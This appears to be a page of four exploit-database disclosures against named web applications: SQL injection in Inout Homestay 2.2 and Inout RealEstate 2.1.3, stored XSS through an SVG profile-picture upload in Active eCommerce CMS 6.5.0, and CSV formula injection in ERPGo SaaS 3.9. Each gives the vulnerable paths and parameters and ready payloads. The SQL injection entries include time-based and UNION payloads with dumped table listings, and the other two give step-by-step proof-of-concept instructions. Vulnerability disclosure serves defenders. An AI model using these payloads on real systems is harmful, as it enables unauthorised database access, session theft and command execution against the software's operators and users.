<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : inoutscripts.com │<br />│ Vendor : Inout Scripts - Nesote Technologies Private Limited │<br />│ Software : Inout Homestay 2.2 │<br />│ Vuln Type: SQL Injection │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │<br />│ data and crash the application or make it unavailable, leading to lost revenue and │<br />│ damage to a company's reputation. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /index.php?page=search/searchdetailed<br /><br />broom=1[Inject-HERE]&bathr=1[Inject-HERE]&beds=1[Inject-HERE]&location=Indianapolis, IN, USA&address=Indianapolis, IN, USA&lat=39.768403&longi=-86.158068&indate=&outdate=&numguest=2[Inject-HERE]&property1=1&property2=7&property3=4&option=1&pstart=all&pend=948&page=1&type=2&type=2&userseachstate=Indiana&userseachcity=Indianapolis<br /><br />POST parameter 'broom' is vulnerable to SQLI<br />POST parameter 'bathr' is vulnerable to SQLI<br />POST parameter 'beds' is vulnerable to SQLI<br />POST parameter 'numguest' is vulnerable to SQLI<br /><br /><br />Path: /index.php?page=search/rentals<br /><br />location=Indianapolis%2C+IN%2C+USA&indate=&outdate=&address=Indianapolis%2C+IN%2C+USA&lat=39.768403&long=-86.158068&guests=2[Inject-HERE]&searchcity=Indianapolis&searchstate=Indiana<br /><br />POST parameter 'guests' is vulnerable to SQLI<br /><br />---<br />Parameter: broom (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: broom=1 AND (SELECT 4813 FROM (SELECT(SLEEP(5)))Pudr)&bathr=1&beds=1&location=Split, Croatia&address=21000, Split, Croatia&lat=43.5147118&longi=16.4435148&indate=&outdate=&numguest=2&property1=1,2,3&property2=7,8,9,10,14,15&property3=4,5,6&option=1,2&pstart=&pend=&page=1&type=2&type=2&userseachstate=Split-Dalmatia County&userseachcity=Split<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 27 columns<br /> Payload: broom=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716b787a71,0x564451596473794d69586f5a4677435270534b45566a6558734e4f5a72434279645855646f54456f,0x71786a6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&bathr=1&beds=1&location=Split, Croatia&address=21000, Split, Croatia&lat=43.5147118&longi=16.4435148&indate=&outdate=&numguest=2&property1=1,2,3&property2=7,8,9,10,14,15&property3=4,5,6&option=1,2&pstart=&pend=&page=1&type=2&type=2&userseachstate=Split-Dalmatia County&userseachcity=Split<br />---<br /><br />[INFO] the back-end DBMS is MySQL<br />back-end DBMS: MySQL >= 5.0.12<br />[INFO] fetching tables for database: '*****_homestay'<br />Database: *****_homestay<br /><br />[52 tables]<br />+----------------------------------+<br />| admin_account |<br />| admin_payment_details |<br />| category_property |<br />| chat_details |<br />| chat_messages |<br />| checkout_ipn |<br />| countries |<br />| coupon_detail |<br />| cron_details |<br />| custom_field |<br />| demo_message |<br />| email_details |<br />| email_templates |<br />| forgetpassword |<br />| host_rejected |<br />| inout_ipns |<br />| languages |<br />| list_date_request |<br />| list_images |<br />| listing_date |<br />| listing_detail |<br />| listing_main |<br />| message_notify_app |<br />| messages |<br />| msg_req_temp |<br />| ppc_currency |<br />| public_side_media_detail |<br />| public_slide_images |<br />| refund_creditupdate |<br />| request_coupon_detail |<br />| settings |<br />| superhost_detail |<br />| traveller_bank_deposit_history |<br />| traveller_cancellation_modes |<br />| traveller_cancelled |<br />| user_account_detail |<br />| user_address_verify_request |<br />| user_details |<br />| user_email_verification |<br />| user_listing_request |<br />| user_refunddetails |<br />| user_registration |<br />| user_reviews |<br />| user_search_details |<br />| user_settings |<br />| user_wishlist_mapping |<br />| user_withdrawal_details |<br />| userabusereport |<br />| userbank_pending_listing_request |<br />| usercancellationsaction |<br />| wish_list |<br />| withdrawal_request |<br />+----------------------------------+<br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: Active eCommerce CMS 6.5.0 - 'svg' Stored Cross-Site<br />Scripting (XSS)<br /># Date: 19/01/2023<br /># Exploit Author: Sajibe Kanti<br /># Vendor Name: ActiveITzone<br /># Vendor Homepage: https://activeitzone.com/<br /># Software Link: https://codecanyon.net/item/active-ecommerce-cms/23471405<br /># Version: 6.5.0<br /># Tested on: Live ( Centos & Litespeed Web Server)<br /># Demo Link : https://demo.activeitzone.com/ecommerce/<br /><br /># Description #<br /><br />The Active eCommerce CMS 6.5.0 application has a vulnerability in the<br />profile picture upload feature that allows for stored cross-site scripting<br />(XSS) attacks. Specifically, the vulnerability lies in the handling of<br />"svg" image files, which can contain malicious code. An attacker can<br />exploit this vulnerability by uploading a specially crafted "svg" image<br />file as a profile picture, which will then be executed by the application<br />when the user views the profile. This can allow the attacker to steal<br />sensitive information, such as login credentials, or to perform other<br />malicious actions on the user's behalf. This vulnerability highlights the<br />importance of proper input validation and image file handling in web<br />application development.<br /><br /># Exploit Details #<br /><br /># Vulnerable Path : /aiz-uploader/upload<br /># Parameter: files (POST)<br /># Vector: <svg version="1.1" baseProfile="full" xmlns="<br />http://www.w3.org/2000/svg"><br /> <rect width="300" height="100"<br />style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" /><br /> <script type="text/javascript"><br /> alert("haha XSS");<br /> </script><br /></svg><br /><br /># Proof of Concept (PoC) : Exploit #<br /><br />1) Goto: https://localhost<br />2) Click Registration<br />3) Login Your Account<br />4) Go Manage Profile<br />5) Now Upload Given Vector as anyname.svg (you must put vector code in<br />anyname.svg file)<br />6) After Upload Clic to view Your profile picture<br />7) XSS Popup Will Fired<br /><br /># Image PoC : Reference Image #<br /><br />1) Payload Fired: https://prnt.sc/cW0F_BtpyMcv<br /></code></pre>
<pre><code># Exploit Title: ERPGo SaaS 3.9 - CSV Injection<br /># Date: 18/01/2023<br /># Exploit Author: Sajibe Kanti<br /># CVE ID:<br /># Vendor Name: RajodiyaInfotech<br /># Vendor Homepage: https://rajodiya.com/<br /># Software Link:<br />https://codecanyon.net/item/erpgo-saas-all-in-one-business-erp-with-project-account-hrm-crm-pos/33263426<br /># Version: 3.9<br /># Tested on: Windows & Live Litespeed Web Server<br /># Demo Link : https://demo.rajodiya.com/erpgo-saas/login<br /><br /># Description #<br /><br />ERPGo is a software as a service (SaaS) platform that is vulnerable to CSV<br />injection attacks. This type of attack occurs when an attacker is able to<br />manipulate the data that is imported or exported in a CSV file, in order to<br />execute malicious code or gain unauthorized access to sensitive<br />information. This vulnerability can be exploited by an attacker by<br />injecting specially crafted data into a CSV file, which is then imported<br />into the ERPGo system. This can potentially allow the attacker to gain<br />access to sensitive information, such as login credentials or financial<br />data, or to execute malicious code on the system.<br /><br /># Proof of Concept (PoC) : Exploit #<br /><br />1) Go To : https://erpgo.127.0.0.1/ERPGo/register <====| Register New<br />account<br />2) Complete the Registration<br />3) Now Click Accounting System Then Customer<br />4) Now Add a New Vendors / Click Create<br />5) Now Add this Payload in Name : =10+20+cmd|' /C calc'!A0<br />6) Now Submit This Form<br />7) Now Download Vendors List as csv<br />8) Open This CSV File in excel<br />9) Now a Calculator will open<br /><br /># Image PoC : Reference Image #<br /><br />1) Payload Fired: https://prnt.sc/EkKPZiMa6yz8<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : inoutscripts.com │<br />│ Vendor : Inout Scripts - Nesote Technologies Private Limited │<br />│ Software : Inout RealEstate 2.1.3 │<br />│ Vuln Type: SQL Injection │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │<br />│ data and crash the application or make it unavailable, leading to lost revenue and │<br />│ damage to a company's reputation. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /index.php<br /><br />POST parameter 'lidaray' is vulnerable to SQLI<br /><br />lidaray=[Inject-HERE]<br /><br />---<br />Parameter: lidaray (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: lidaray=' AND (SELECT 9508 FROM (SELECT(SLEEP(5)))BNUc) AND 'IpMJ'='IpMJ<br />---<br /><br />[INFO] the back-end DBMS is MySQL<br />back-end DBMS: MySQL >= 5.0.12<br />[INFO] fetching tables for database: '*****_realestate'<br />[INFO] fetching number of tables for database ''*****_realestate'<br />Database: *****_realestate<br /><br />[45 tables]<br />+--------------------------------+<br />| adcode |<br />| admin_account |<br />| admin_payment_details |<br />| agent_list_request_to_user |<br />| broker_citymap |<br />| broker_rate |<br />| broker_review |<br />| brokerabusereport |<br />| category_property |<br />| chat_details |<br />| chat_messages |<br />| checkout_ipn |<br />| countries |<br />| custom_field |<br />| detail_statistics_list |<br />| email_templates |<br />| enquiry_status |<br />| forgetpassword |<br />| inout_ipns |<br />| invoicegen |<br />| languages |<br />| list_brokermap |<br />| list_images |<br />| list_main |<br />| listopenhouse |<br />| normal_statistics_list |<br />| paymentdetailstat |<br />| popularsearchlist |<br />| ppc_currency |<br />| public_side_media_detail |<br />| public_slide_images |<br />| recentsearchlist |<br />| settings |<br />| sold_listing |<br />| soldlistadd |<br />| traveller_bank_deposit_history |<br />| user_broker_licenses |<br />| user_broker_registration |<br />| user_email_verification |<br />| user_list_agent_request |<br />| user_registration |<br />| user_wishlist_mapping |<br />| userabusereport |<br />| userlistactive |<br />| wish_list |<br />+--------------------------------+<br /><br />[-] Done<br /></code></pre>